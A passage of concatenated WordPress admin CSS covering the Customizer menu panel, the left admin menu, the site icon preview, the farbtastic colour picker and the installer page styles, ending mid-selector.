.spinner{position:absolute;bottom:24px;left:21px;margin:0!important}#available-menu-items #available-menu-items-search .accordion-section-content{position:absolute;right:0;top:83px;bottom:0;max-height:none;width:100%;padding:1px 15px 15px;box-sizing:border-box}#available-menu-items-search .nothing-found{margin-top:-1px}#available-menu-items-search .accordion-section-title:after{display:none}#available-menu-items-search .accordion-section-content:empty{min-height:0;padding:0}#available-menu-items-search.loading .accordion-section-content div{opacity:.5}#available-menu-items-search.loading.loading-more .accordion-section-content div{opacity:1}@media (prefers-reduced-motion:no-preference){#customize-preview{transition:all .2s}}body.adding-menu-items #available-menu-items{right:0;visibility:visible}body.adding-menu-items .wp-full-overlay-main{right:300px}body.adding-menu-items #customize-preview{opacity:.4}body.adding-menu-items #customize-preview iframe{pointer-events:none}.menu-item-handle .spinner{display:none;float:right;margin:0 0 0 8px}.nav-menu-inserted-item-loading .spinner{display:block}.nav-menu-inserted-item-loading .menu-item-handle .item-type{padding:0 8px 0 0}.added-menu-item .menu-item-handle.loading,.nav-menu-inserted-item-loading .menu-item-handle{padding:10px 8px 10px 15px;cursor:default;opacity:.5;background:#fff;color:#787c82}.added-menu-item .menu-item-handle{transition-property:opacity,background,color;transition-duration:1.25s;transition-timing-function:cubic-bezier(.25,-2.5,.75,8)}#customize-theme-controls .control-panel-content .control-section-nav_menu:nth-last-child(2) .accordion-section-title{border-bottom-color:#dcdcde}#accordion-section-add_menu{margin:15px 12px}#accordion-section-add_menu h3{text-align:left}#accordion-section-add_menu .customize-add-menu-button,#accordion-section-add_menu h3{margin:0}#accordion-section-add_menu .customize-add-menu-button{font-weight:400}#create-new-menu-submit{float:left;margin:0 0 12px}.menu-delete-item{float:right;padding:1em 0;width:100%}.assigned-menu-locations-title p{margin:0 0 8px}li.assigned-to-menu-location .menu-delete-item{display:none}li.assigned-to-menu-location .add-new-menu-item{margin-bottom:1em}.menu-item-handle{margin-top:-1px}.ui-sortable-disabled .menu-item-handle{cursor:default}.menu-item-handle:hover{position:relative;z-index:10;color:var(--wp-admin-theme-color)}#available-menu-items .menu-item-handle:hover .item-add,.menu-item-handle:hover .item-edit,.menu-item-handle:hover .item-type{color:var(--wp-admin-theme-color)}.menu-item-edit-active .menu-item-handle{border-color:#8c8f94;border-bottom:none}.customize-control-nav_menu_item{margin-bottom:0}.customize-control-nav_menu .new-menu-item-invitation{margin-top:0;margin-bottom:0}.customize-control-nav_menu .customize-control-nav_menu-buttons{display:flex;flex-direction:row-reverse;align-items:center;gap:8px;margin-top:12px}#available-menu-items .item-add:focus:before,#customize-controls .customize-info .customize-help-toggle:focus:before,.customize-screen-options-toggle:focus:before,.menu-delete:focus,.menu-item-bar .item-delete:focus:before,.wp-customizer .menu-item .submitbox .submitdelete:focus,.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}@media screen and (max-width:782px){#available-menu-items #available-menu-items-search .accordion-section-content{top:71px}}@media screen and (max-width:640px){#available-menu-items #available-menu-items-search .accordion-section-content{top:154px}}/*! This file is auto-generated */ #adminmenuback, #adminmenuwrap, #adminmenu, #adminmenu .wp-submenu { width: 160px; background-color: #1d2327; } #adminmenuback { position: fixed; top: 0; bottom: -120px; z-index: 1; /* positive z-index to avoid elastic scrolling woes in Safari */ /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .php-error #adminmenuback { position: absolute; } .php-error #adminmenuback, .php-error #adminmenuwrap { margin-top: 2em; } #adminmenu { clear: right; margin: 12px 0; padding: 0; list-style: none; } .folded #adminmenuback, .folded #adminmenuwrap, .folded #adminmenu, .folded #adminmenu li.menu-top { width: 36px; } /* New Menu icons */ /* hide background-image for icons above */ .menu-icon-dashboard div.wp-menu-image, .menu-icon-post div.wp-menu-image, .menu-icon-media div.wp-menu-image, .menu-icon-links div.wp-menu-image, .menu-icon-page div.wp-menu-image, .menu-icon-comments div.wp-menu-image, .menu-icon-appearance div.wp-menu-image, .menu-icon-plugins div.wp-menu-image, .menu-icon-users div.wp-menu-image, .menu-icon-tools div.wp-menu-image, .menu-icon-settings div.wp-menu-image, .menu-icon-site div.wp-menu-image, .menu-icon-generic div.wp-menu-image { background-image: none !important; } /*------------------------------------------------------------------------------ 7.0 - Main Navigation (Left Menu) ------------------------------------------------------------------------------*/ #adminmenuwrap { position: relative; float: right; z-index: 9990; } /* side admin menu */ #adminmenu * { -webkit-user-select: none; user-select: none; } #adminmenu li { margin: 0; padding: 0; } #adminmenu a { display: block; line-height: 1.3; padding: 2px 5px; color: #f0f0f1; } #adminmenu .wp-submenu a { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); font-size: 13px; line-height: 1.4; margin: 0; padding: 5px 0; } #adminmenu .wp-submenu a:hover, #adminmenu .wp-submenu a:focus { background: none; } #adminmenu a:hover, #adminmenu li.menu-top > a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-submenu a:focus { color: #72aee6; } #adminmenu a:hover, #adminmenu a:focus, .folded #adminmenu .wp-submenu-head:hover { box-shadow: inset -4px 0 0 0 currentColor; transition: box-shadow .1s linear; border-radius: 0; } #adminmenu li.menu-top { border: none; min-height: 34px; position: relative; } #adminmenu .wp-submenu { list-style: none; position: absolute; top: -1000em; right: 160px; overflow: visible; word-wrap: break-word; padding: 6px 0; z-index: 9999; background-color: #2c3338; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); } .js #adminmenu .sub-open, .js #adminmenu .opensub .wp-submenu, #adminmenu a.menu-top:focus + .wp-submenu, .no-js li.wp-has-submenu:hover .wp-submenu { top: -1px; } #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { top: 0; } #adminmenu .wp-has-current-submenu .wp-submenu, .no-js li.wp-has-current-submenu:hover .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, #adminmenu .wp-has-current-submenu.opensub .wp-submenu { position: relative; z-index: 3; top: auto; right: auto; left: auto; bottom: auto; border: 0 none; margin-top: 0; box-shadow: none; } .folded #adminmenu .wp-has-current-submenu .wp-submenu { box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); } /* ensure that wp-submenu's box shadow doesn't appear on top of the focused menu item's background. */ #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { position: relative; background-color: #1d2327; color: #72aee6; } .folded #adminmenu li.menu-top:hover, .folded #adminmenu li.opensub > a.menu-top, .folded #adminmenu li > a.menu-top:focus { z-index: 10000; } #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.current a.menu-top, #adminmenu .wp-has-current-submenu .wp-submenu .wp-submenu-head { background: #2271b1; color: #fff; } .folded #adminmenu .wp-submenu.sub-open, .folded #adminmenu .opensub .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, .folded #adminmenu .wp-has-current-submenu.opensub .wp-submenu, .folded #adminmenu a.menu-top:focus + .wp-submenu, .folded #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu, .no-js.folded #adminmenu .wp-has-submenu:hover .wp-submenu { top: 0; right: 36px; } .folded #adminmenu a.wp-has-current-submenu:focus + .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu { position: absolute; top: -1000em; } #adminmenu .wp-not-current-submenu .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu { min-width: 160px; width: auto; border: 1px solid transparent; border-right-width: 5px; } #adminmenu .wp-submenu li.current, #adminmenu .wp-submenu li.current a, #adminmenu .opensub .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus { color: #fff; } #adminmenu .wp-not-current-submenu li > a, .folded #adminmenu .wp-has-current-submenu li > a { padding-left: 16px; padding-right: 14px; /* Exclude from the transition the outline for Windows High Contrast mode */ transition: all .1s ease-in-out, outline 0s; } #adminmenu .wp-has-current-submenu ul > li > a, .folded #adminmenu li.menu-top .wp-submenu > li > a { padding: 5px 12px; } #adminmenu a.menu-top, #adminmenu .wp-submenu-head { font-size: 14px; font-weight: 400; line-height: 1.3; padding: 0; } #adminmenu .wp-submenu-head { display: none; } .folded #adminmenu .wp-menu-name { position: absolute; right: -999px; } .folded #adminmenu .wp-submenu-head { display: block; } #adminmenu .wp-submenu li { padding: 0; margin: 0; } #adminmenu .wp-menu-image img { padding: 9px 0 0; opacity: 0.6; filter: alpha(opacity=60); } #adminmenu div.wp-menu-name { padding: 8px 36px 8px 8px; overflow-wrap: break-word; word-wrap: break-word; -ms-word-break: break-all; word-break: break-word; hyphens: auto; } #adminmenu div.wp-menu-image { float: right; width: 36px; height: 34px; margin: 0; text-align: center; } #adminmenu div.wp-menu-image.svg { background-repeat: no-repeat; background-position: center; background-size: 20px auto; } div.wp-menu-image:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); padding: 7px 0; transition: all .1s ease-in-out; } #adminmenu div.wp-menu-image:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); } #adminmenu li.wp-has-current-submenu:hover div.wp-menu-image:before, #adminmenu .wp-has-current-submenu div.wp-menu-image:before, #adminmenu .current div.wp-menu-image:before, #adminmenu a.wp-has-current-submenu:hover div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before { color: #fff; } #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #72aee6; } .folded #adminmenu div.wp-menu-image { width: 35px; height: 30px; position: absolute; z-index: 25; } .folded #adminmenu a.menu-top { height: 34px; } /* Sticky admin menu */ .sticky-menu #adminmenuwrap { position: fixed; } ul#adminmenu a.wp-has-current-submenu { position: relative; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { left: 0; border: solid 8px transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; border-left-color: #f0f0f1; top: 50%; margin-top: -8px; } .folded ul#adminmenu li:hover a.wp-has-current-submenu:after, .folded ul#adminmenu li.wp-has-current-submenu:focus-within a.wp-has-current-submenu:after { display: none; } .folded ul#adminmenu a.wp-has-current-submenu:after, .folded ul#adminmenu > li a.current:after { border-width: 4px; margin-top: -4px; } /* flyout menu arrow */ #adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { left: 0; border: 8px solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; top: 10px; z-index: 10000; } .folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-width: 4px; margin-top: -4px; top: 18px; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: #2c3338; } #adminmenu li.menu-top:hover .wp-menu-image img, #adminmenu li.wp-has-current-submenu .wp-menu-image img { opacity: 1; filter: alpha(opacity=100); } #adminmenu li.wp-menu-separator { height: 5px; padding: 0; margin: 0 0 6px; cursor: inherit; } /* @todo: is this even needed given that it's nested beneath the above li.wp-menu-separator? */ #adminmenu div.separator { height: 2px; padding: 0; } #adminmenu .wp-submenu .wp-submenu-head { color: #fff; font-weight: 400; font-size: 14px; padding: 5px 11px 5px 4px; margin: -8px -5px 4px -1px; border-width: 3px 5px 3px 1px; border-style: solid; border-color: transparent; } #adminmenu li.current, .folded #adminmenu li.wp-menu-open { border: 0 none; } /* @todo: consider to use a single rule for these counters and the list table comments counters. */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { display: inline-block; vertical-align: top; box-sizing: border-box; margin: 1px 2px -1px 0; padding: 0 5px; min-width: 18px; height: 18px; border-radius: 9px; background-color: #d63638; color: #fff; font-size: 11px; line-height: 1.6; text-align: center; z-index: 26; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins { background-color: #d63638; color: #fff; } #adminmenu li span.count-0 { display: none; } #collapse-button { display: block; width: 100%; height: 34px; margin: 0; border: none; padding: 0; position: relative; overflow: visible; background: none; color: #a7aaad; cursor: pointer; } #collapse-button:hover { color: #72aee6; } #collapse-button:focus { color: #72aee6; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: -1px; } #collapse-button .collapse-button-icon, #collapse-button .collapse-button-label { /* absolutely positioned to avoid 1px shift in IE when button is pressed */ display: block; position: absolute; top: 0; right: 0; } #collapse-button .collapse-button-label { top: 8px; } #collapse-button .collapse-button-icon { width: 36px; height: 34px; } #collapse-button .collapse-button-label { padding: 0 36px 0 0; } .folded #collapse-button .collapse-button-label { display: none; } #collapse-button .collapse-button-icon:after { content: "\f148"; content: "\f148" / ''; display: block; position: relative; top: 7px; text-align: center; font: normal 20px/1 dashicons !important; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* rtl:ignore */ .folded #collapse-button .collapse-button-icon:after, .rtl #collapse-button .collapse-button-icon:after { transform: rotate(180deg); } .rtl.folded #collapse-button .collapse-button-icon:after { transform: none; } #collapse-button .collapse-button-icon:after, #collapse-button .collapse-button-label { transition: all .1s ease-in-out; } /** * Toolbar menu toggle */ li#wp-admin-bar-menu-toggle { display: none; } /* Hide-if-customize for items we can't add classes to */ .customize-support #menu-appearance a[href="themes.php?page=custom-header"], .customize-support #menu-appearance a[href="themes.php?page=custom-background"] { display: none; } /* Auto-folding of the admin menu */ @media only screen and (max-width: 960px) { .auto-fold #wpcontent, .auto-fold #wpfooter { margin-right: 36px; } .auto-fold #adminmenuback, .auto-fold #adminmenuwrap, .auto-fold #adminmenu, .auto-fold #adminmenu li.menu-top { width: 36px; } .auto-fold #adminmenu .wp-submenu.sub-open, .auto-fold #adminmenu .opensub .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, .auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu, .auto-fold #adminmenu a.menu-top:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu { top: 0; right: 36px; } .auto-fold #adminmenu a.wp-has-current-submenu:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { position: absolute; top: -1000em; margin-left: -1px; padding: 6px 0; z-index: 9999; } .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { min-width: 160px; width: auto; border: 1px solid transparent; border-right-width: 5px; } .auto-fold #adminmenu .wp-has-current-submenu li > a { padding-left: 16px; padding-right: 14px; } .auto-fold #adminmenu li.menu-top .wp-submenu > li > a { padding-right: 12px; } .auto-fold #adminmenu .wp-menu-name { position: absolute; right: -999px; } .auto-fold #adminmenu .wp-submenu-head { display: block; } .auto-fold #adminmenu div.wp-menu-image { height: 30px; width: 34px; position: absolute; z-index: 25; } .auto-fold #adminmenu a.menu-top { min-height: 34px; } .auto-fold #adminmenu li.wp-menu-open { border: 0 none; } .auto-fold #adminmenu .wp-has-current-submenu.menu-top-last { margin-bottom: 0; } .auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after, .auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after { display: none; } .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-width: 4px; margin-top: -4px; top: 16px; } .auto-fold ul#adminmenu a.wp-has-current-submenu:after, .auto-fold ul#adminmenu > li a.current:after { border-width: 4px; margin-top: -4px; } .auto-fold #adminmenu li.menu-top:hover, .auto-fold #adminmenu li.opensub > a.menu-top, .auto-fold #adminmenu li > a.menu-top:focus { z-index: 10000; } .auto-fold #collapse-menu .collapse-button-label { display: none; } /* rtl:ignore */ .auto-fold #collapse-button .collapse-button-icon:after { transform: rotate(180deg); } .rtl.auto-fold #collapse-button .collapse-button-icon:after { transform: none; } } @media screen and (max-width: 782px) { .auto-fold #wpcontent { position: relative; margin-right: 0; padding-right: 10px; } .sticky-menu #adminmenuwrap { position: relative; z-index: auto; top: 0; } /* Sidebar Adjustments */ .auto-fold #adminmenu, .auto-fold #adminmenuback, .auto-fold #adminmenuwrap { position: absolute; width: 190px; z-index: 100; } .auto-fold #adminmenuback { position: fixed; } .auto-fold #adminmenuback, .auto-fold #adminmenuwrap { display: none; } .auto-fold .wp-responsive-open #adminmenuback, .auto-fold .wp-responsive-open #adminmenuwrap { display: block; } .auto-fold #adminmenu li.menu-top { width: 100%; } /* Resize the admin menu items to a comfortable touch size */ .auto-fold #adminmenu li a { font-size: 16px; padding: 5px; } .auto-fold #adminmenu li.menu-top .wp-submenu > li > a { padding: 10px 20px 10px 10px; } /* Restore the menu names */ .auto-fold #adminmenu .wp-menu-name { position: static; } /* Switch the arrow side */ .auto-fold ul#adminmenu a.wp-has-current-submenu:after, .auto-fold ul#adminmenu > li.current > a.current:after { border-width: 8px; margin-top: -8px; } .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { display: none; } /* Make the submenus appear correctly when tapped. */ #adminmenu .wp-submenu { position: relative; display: none; } .auto-fold #adminmenu .selected .wp-submenu, .auto-fold #adminmenu .wp-menu-open .wp-submenu { position: relative; display: block; top: 0; right: -1px; box-shadow: none; } .auto-fold #adminmenu .selected .wp-submenu:after, .auto-fold #adminmenu .wp-menu-open .wp-submenu:after { display: none; } .auto-fold #adminmenu .opensub .wp-submenu { display: none; } .auto-fold #adminmenu .selected .wp-submenu { display: block; } .auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after, .auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after { display: block; } .auto-fold #adminmenu a.menu-top:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu { position: relative; right: -1px; left: 0; top: 0; } #adminmenu .wp-not-current-submenu .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { border: none; } /* Remove submenu headers and adjust sub meu*/ #adminmenu .wp-submenu .wp-submenu-head { display: none; } /* Toolbar menu toggle */ #wp-responsive-toggle { position: fixed; top: 5px; right: 4px; padding-left: 10px; z-index: 99999; border: none; box-sizing: border-box; } #wpadminbar #wp-admin-bar-menu-toggle a { display: block; padding: 0; overflow: hidden; outline: none; text-decoration: none; border: 1px solid transparent; background: none; height: 44px; margin-right: -1px; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #2c3338; } li#wp-admin-bar-menu-toggle { display: block; } #wpadminbar #wp-admin-bar-menu-toggle a:hover { border: 1px solid transparent; } #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { content: "\f228"; display: inline-block; float: right; font: normal 40px/45px dashicons; vertical-align: middle; outline: none; margin: 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; height: 44px; width: 50px; padding: 0; border: none; text-align: center; text-decoration: none; box-sizing: border-box; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #72aee6; } } /* Smartphone */ @media screen and (max-width: 600px) { #adminmenuwrap, #adminmenuback { display: none; } .wp-responsive-open #adminmenuwrap, .wp-responsive-open #adminmenuback { display: block; } .auto-fold #adminmenu { top: 46px; } } /*! This file is auto-generated */ /*------------------------------------------------------------------------------ 28.0 - Site Icon ------------------------------------------------------------------------------*/ .site-icon-section { --site-icon-removal: #b32d2e; } .site-icon-preview { --site-icon-input-border: #8c8f94; --site-icon-preview-background: #fff; --site-icon-preview-browser-top: #dcdcde; --site-icon-preview-browser-bottom: #a7aaad; --site-icon-preview-browser-border: rgba(255, 255, 255, 0.2); --site-icon-address-bar-background: #f0f0f1; --site-icon-address-bar-close: #646970; --site-icon-address-bar-text: #3c434a; --site-icon-shadow-1: rgba(0, 0, 0, 0.1); --site-icon-shadow-2: rgba(0, 0, 0, 0.2); --site-icon-shadow-3: rgba(0, 0, 0, 0.5); direction: initial; display: flex; height: 60px; padding: 8px 8px 0 0; align-items: flex-start; position: relative; overflow: hidden; box-sizing: border-box; border: 1px solid var(--site-icon-input-border); border-radius: 4px; background-color: var(--site-icon-preview-background); width: 275px; } @media (prefers-color-scheme: dark) { .site-icon-preview { --site-icon-preview-browser-top: #2c3338; --site-icon-preview-browser-bottom: #111; --site-icon-address-bar-background: #3c434a; --site-icon-address-bar-close: #f0f0f1; --site-icon-address-bar-text: #f0f0f1; } } .site-icon-preview.settings { height: 88px; padding: 16px 16px 0 0; width: 350px; margin: 0 0 16px 0; } .site-icon-preview.crop { width: 258px; height: 100%; display: grid; grid-template-columns: 8px 1fr; grid-template-rows: 64px 1fr; padding-right: 0; row-gap: 16px; direction: inherit; } .site-icon-preview.hidden { display: none; } .site-icon-preview .direction-wrap { grid-template-columns: 44px 1fr; gap: 8px; display: grid; direction: rtl; height: 100%; width: 100%; } .site-icon-preview.settings .direction-wrap { grid-template-columns: 58px 1fr; gap: 16px; } .site-icon-preview:after { --after-size: 150%; aspect-ratio: 1/1; content: ""; display: block; position: absolute; top: 0; right: 0; width: var(--after-size);; transform: translate(calc(-1*(var(--after-size) * -0.125)), calc(var(--after-size) * -0.125)); filter: blur(5px); opacity: 0.5; background: var(--site-icon-url); } .site-icon-preview .app-icon-preview { aspect-ratio: 1/1; border-radius: 10px; box-shadow: 0 1px 5px 0 var(--site-icon-shadow-3); flex-shrink: 0; width: 100%; z-index: 1; } .site-icon-preview-browser { display: flex; padding: 4px 12px 0 4px; align-items: flex-start; gap: 16px; flex: 1 0 0; z-index: 1; border-top-right-radius: 10px; border-top: 1px solid var(--site-icon-preview-browser-border); border-right: 1px solid var(--site-icon-preview-browser-border); background: linear-gradient(-180deg, var(--site-icon-preview-browser-top) 0%, var(--site-icon-preview-browser-bottom) 100%); box-shadow: 0 10px 22px 0 var(--site-icon-shadow-2); } .site-icon-preview .browser-buttons { width: 48px; height: 40px; fill: var(--site-icon-input-border); } .site-icon-preview-tab { padding: 8px; align-items: center; gap: 8px; flex: 1 0 0; border-radius: 4px; background-color: var(--site-icon-address-bar-background); box-shadow: 0 1px 3px 0 var(--site-icon-shadow-1); display: grid; grid-template-columns: 24px auto 24px; } .site-icon-preview-browser .browser-icon-preview { box-shadow: 0 0 20px 0 var(--site-icon-shadow-1); } .site-icon-preview-tab > img, .site-icon-preview-tab > svg { width: 24px; height: 24px; } .site-icon-preview-tab > svg { fill: var(--site-icon-address-bar-close); } .site-icon-preview-site-title { color: var(--site-icon-address-bar-text); text-overflow: ellipsis; white-space: nowrap; overflow: hidden; font-weight: 500; } .site-icon-preview-crop-modal .image-preview-wrap.app-icon-preview { width: 64px; height: 64px; margin: 0; grid-column: 2; } .site-icon-preview-crop-modal .site-icon-preview-browser { grid-column: 2; } .site-icon-preview-crop-modal .image-preview-wrap { overflow: hidden; aspect-ratio: 1/1; } .site-icon-preview-crop-modal .image-preview-wrap.browser { width: 24px; height: 24px; } button.reset.remove-site-icon { color: var(--site-icon-removal); text-decoration: none; border-color: currentColor; box-shadow: none; background: transparent; } button.reset.remove-site-icon:focus, button.reset.remove-site-icon:hover { background: var(--site-icon-removal); color: #fff; border-color: var(--site-icon-removal); box-shadow: 0 0 0 1px var(--site-icon-removal); } .site-icon-action-buttons { display: flex; flex-wrap: wrap; gap: 10px; } /*! This file is auto-generated */ .farbtastic { position: relative; } .farbtastic * { position: absolute; cursor: crosshair; } .farbtastic, .farbtastic .wheel { width: 195px; height: 195px; } .farbtastic .color, .farbtastic .overlay { top: 47px; right: 47px; width: 101px; height: 101px; } .farbtastic .wheel { background: url(../images/wheel.png) no-repeat; width: 195px; height: 195px; } .farbtastic .overlay { background: url(../images/mask.png) no-repeat; } .farbtastic .marker { width: 17px; height: 17px; margin: -8px -8px 0 0; overflow: hidden; background: url(../images/marker.png) no-repeat; } html { background: #f0f0f1; margin: 0 20px; } body { background: #fff; border: 1px solid #c3c4c7; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; margin: 140px auto 25px; padding: 20px 20px 10px; max-width: 700px; -webkit-font-smoothing: subpixel-antialiased; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } a { color: var(--wp-admin-theme-color); } a:hover, a:active { color: var(--wp-admin-theme-color-darker-20); } a:focus { color: var(--wp-admin-theme-color-darker-20); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } h1, h2 { border-bottom: 1px solid #dcdcde; clear: both; color: #646970; font-size: 24px; padding: 0 0 7px; font-weight: 400; } h3 { font-size: 16px; } p, li, dd, dt { padding-bottom: 2px; font-size: 14px; line-height: 1.5; } code, .code { font-family: Consolas, Monaco, monospace; } ul, ol, dl { padding: 5px 5px 5px 22px; } a img { border: 0 } abbr { border: 0; font-variant: normal; } fieldset { border: 0; padding: 0; margin: 0; } #logo { margin: -130px auto 25px; padding: 0 0 25px; width: 84px; height: 84px; overflow: hidden; background-image: url(../images/w-logo-gray.png?ver=20260303); background-image: none, url(../images/wordpress-logo-gray.svg?ver=20260303); background-size: 84px; background-position: center top; background-repeat: no-repeat; color: #3c434a; /* same as login.css */ font-size: 20px; font-weight: 400; line-height: 1.3em; text-decoration: none; text-align: center; text-indent: -9999px; outline: none; } .step { margin: 20px 0 15px; } .step, th { text-align: left; padding: 0; } .language-chooser.wp-core-ui .step .button.button-large { font-size: 14px; } textarea { border: 1px solid #dcdcde; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; width: 100%; box-sizing: border-box; } .form-table { border-collapse: collapse; margin-top: 1em; width: 100%; } .form-table td { margin-bottom: 9px; padding: 10px 20px 10px 0; font-size: 14px; vertical-align: top } .form-table th { font-size: 14px; text-align: left; padding: 10px 20px 10px 0; width: 115px; vertical-align: top; } .form-table code { line-height: 1.28571428; font-size: 14px; } .form-table p { margin: 4px 0 0; font-size: 11px; } .form-table .setup-description { margin: 4px 0 0; line-height: 1.6; } .form-table input { line-height: 1.33333333; font-size: 15px; padding: 3px 5px; } .wp-pwd { margin-top: 0; } .form-table .wp-pwd { display: flex; column-gap: 4px; } .form-table .password-input-wrapper { width: 100%; } input, submit { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; } .form-table input[type=text], .form-table input[type=email], .form-table input[type=url], .form-table input[type=password], #pass-strength-result { width: 100%; } .form-table th p { font-weight: 400; } .form-table.install-success th, .form-table.install-success td { vertical-align: middle; padding: 16px 20px 16px 0; } .form-table.install-success td p { margin: 0; font-size: 14px; } .form-table.install-success td code { margin: 0; font-size: 18px; } #error-page { margin-top: 50px; } #error-page p { font-size: 14px; line-height: 1.28571428; margin: 25px 0 20px; } #error-page code, .code { font-family: Consolas, Monaco, monospace; } .message { border-left: 4px solid #d63638; padding: .7em .6em; background-color: #fcf0f1; } /* rtl:ignore */ #dbname, #uname, #pwd, #dbhost, #prefix, #user_login, #admin_email, #pass1, #pass2 { direction: ltr; } /* localization */ body.rtl, .rtl textarea, .rtl input, .rtl submit { font-family: Tahoma, sans-serif; } :lang(he-il) body.rtl, :lang(he-il) .rtl textarea, :lang(he-il) .rtl input, :lang(he-il) .rtl submit { font-family: Arial, sans-serif; } @media only screen and (max-width: 799px) { body { margin-top: 115px; } #logo a { margin: -125px auto 30px; } } @media screen and (max-width: 782px) { .form-table { margin-top: 0; } .form-table th, .form-table td { display: block; width: auto; vertical-align: middle; } .form-table th { padding: 20px 0 0; } .form-table td { padding: 5px 0; border: 0; margin: 0; } textarea, input { font-size: 16px; } .form-table td input[type="text"], .form-table td input[type="email"], .form-table td input[type="url"], .form-table td input[type="password"], .form-table td select, .form-table td textarea, .form-table span.description { width: 100%; font-size: 16px; line-height: 1.5; padding: 7px 10px; display: block; max-width: none; box-sizing: border-box; } #pwd { padding-right: 2.5rem; } .wp-pwd #pass1 { padding-right: 50px; } .wp-pwd .button.wp-hide-pw { right: 0; } #pass-strength-result { width: 100%; } } body.language-chooser { max-width: 300px; } .language-chooser select { padding: 8px; width: 100%; display: block; border: 1px solid #dcdcde; background: #fff; color: #2c3338; font-size: 16px; font-family: Arial, sans-serif; font-weight: 400; } .language-chooser select:focus { color: #2c3338; } .language-chooser select option:hover, .language-chooser select option:focus { color: var(--wp-admin-theme-color-darker-20); } .language-chooser .step { text-align: right; } .screen-reader-input, .screen-reader-text { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } .spinner { background: url(../images/spinner.gif) no-repeat; background-size: 20px 20px; visibility: hidden; opacity: 0.7; filter: alpha(opacity=70); width: 20px; height: 20px; margin: 2px 5px 0; } .step .spinner { display: inline-block; vertical-align: middle; margin-right: 15px; } .button.hide-if-no-js, .hide-if-no-js { display: none; } /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .spinner { background-image: url(../images/spinner-2x.gif); } } /*! This file is auto-generated */ .wp-core-ui [class*=CodeMirror-lint-message],.wrap .CodeMirror-lint-marker-multiple,.wrap 